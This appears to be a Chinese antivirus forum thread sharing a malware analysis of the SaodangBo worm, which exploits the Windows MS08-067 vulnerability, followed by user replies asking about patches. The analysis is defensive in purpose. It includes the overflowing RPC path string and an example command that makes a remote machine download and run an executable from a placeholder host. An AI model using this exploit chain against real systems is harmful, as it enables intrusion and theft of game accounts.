金山毒霸2009官方下载金山清理专家官方下载金山网盾官方下载金山急救箱官方下载
返回列表 回复 发帖

[分享] 扫荡波蠕虫(Worm.SaodangBo.a.94208)泛滥,未打补丁的系统遭殃

在我的印象中,每一个传播严重的蠕虫都和一个系统漏洞有关:SQLServer蠕虫王,数小时传遍全球;冲击波、震荡波让普通网民认知到蠕虫的威力。而这个MS08-067漏洞,在补丁发布数周之后,也没有发现蠕虫泛滥,也可能是众多的可替代微软update的补丁修复方案越来越普及。

事实上,在这个漏洞发布之后不久,在制造木马盗号的圈子里,各种不同版本的扫描器、批量抓鸡工具在迅速泛滥。因此证明,没有完美的漏洞修复方案,互联网上总是很容易就找到大量不打补丁的计算机。

上周末,把木马下载器、漏洞扫描工具、蠕虫集成在一起的病毒终于泛滥,在这之前,一直有不少网民报告系统崩溃不能上网的现象,但一直没有捕获病毒样本。原来这一类病毒入侵后,会尝试删除自身,抓到的样本只是木马下载器,而蠕虫在得手后就自杀了,这在某种程度上也削弱了蠕虫的传播范围。

以下是毒霸分析员对Worm.SaodangBo.a.94208的技术分析

MS08-067远程下载者(扫荡波)分析报告

1.  释放病毒体
病毒运行后释放以下文件:
aaa.bat,
mrosconfig.exe
vista.exe
qqq.sys
其中aaa.bat控制整个病毒的运行流程。

2. 扫描网内计算机
首先调用vista.exe对本网段(C类)范围内的所有计算机的445端口进行扫描。之后,挑选出可以连上445端口的计算机保存到一个列表文件中。

3. 攻击在线的计算机(有漏洞的会出现现象或中毒)
然后,病毒调用mrosconfig.exe对列表文件中的计算机发送RPC请求,使远程计算机中的svchost.exe中解析RPC路径时溢出,在远程计算机中下载并执行http://xxx.xxx.com/down/ko.exe
mrosconfig.exe是一个实现下载者功能的远程溢出利用工具, 对应的命令行为:
mrosconfig.exe 要攻击的计算机的IP 要在远程下载的病毒的url
如:

mrosconfig.exe 127.0.0.1 http://xxx.xxx.com/down/ko.exe
  
具体的步骤如下:
(1). 使用空用户、空密码连接上远程计算机上的IPC$共享。
(2). 向连上的计算机发送远程路径".\\a\..\..\NN"。如果远程计算机上未修复ms08-067漏洞,那么svchost.exe调用NetpwPathCanonicalize函数解析此路径时会溢出,从而执行远程路径后的指令。
(3). 溢出指令下载附在指令后的url对应的文件到远程计算机上,并运行此文件。
(4). 下载的文件是一个木马下载者,该下载者还会下载其他的木马程序安装到被攻击的计算机上。已知会下载的木马程序包括:机器狗木马下载器,QQ三国、完美系列网游等游戏盗号器。

如果攻击失败,则远程计算机会出现’SVCHOST.exe’出错的提示。只有这个现象是用户可见的。

如果用户反映这个问题,则可以认为其所在的局域网内有机器中毒,但自身没有中。打上补丁就可以避免。

4. 自删除病毒体
删除释放的mrosconfig.exe,vista.exe,qqq.sys,aaa.bat。
提问请注意详细描述现象、操作过程,如果是病毒报告,应说明病毒名,染毒文件路径、文件名等,什么现象都不描述只发一个日志的帖子将被直接删除。
系统还原是中毒后恢复最节约成本的好工具,新手请不要随意禁止系统还原

请新会员关注新手杀毒教程
提示: 作者被禁止或删除 内容自动屏蔽
我家的金山网镖说:::::::: 2008-11-14  13:01:58 成功拦截 1个 针对本机的扫荡波攻击, 来自 222.39.104.9 我该怎么办????????????????

饿

你别往上面输入病毒网站,误点就麻烦了。
谢谢
这世界上为什么有风,是为了隐藏我走时留下的足迹。
这世界上为什么有雨,是为了洗去你记忆中我的印象。
谢谢
ms08-069的补丁为什么更新不了
谢楼主 。
顶一个`````````
学习
学习了。谢谢。
每一个传播严重的蠕虫都和一个系统漏洞有
学习了
我的还好
怎么打补丁,,不用下载微软的,,,,金山清理专家2009能请么????我家上网 总受到扫荡波攻击,,,每次病毒隔离系统都有病毒,,,我怎么办????????????????
帖子上有一些链接,我 是个 新手,请问点了会怎么样?
ms08-069的补丁为什么更新不了?更新怎么弄还是有!! 怕..请快回!!
向铁军大哥学习一下杀毒技巧。
这么说MS08-067是RPC路径溢出
了解学习了,要防御好
返回列表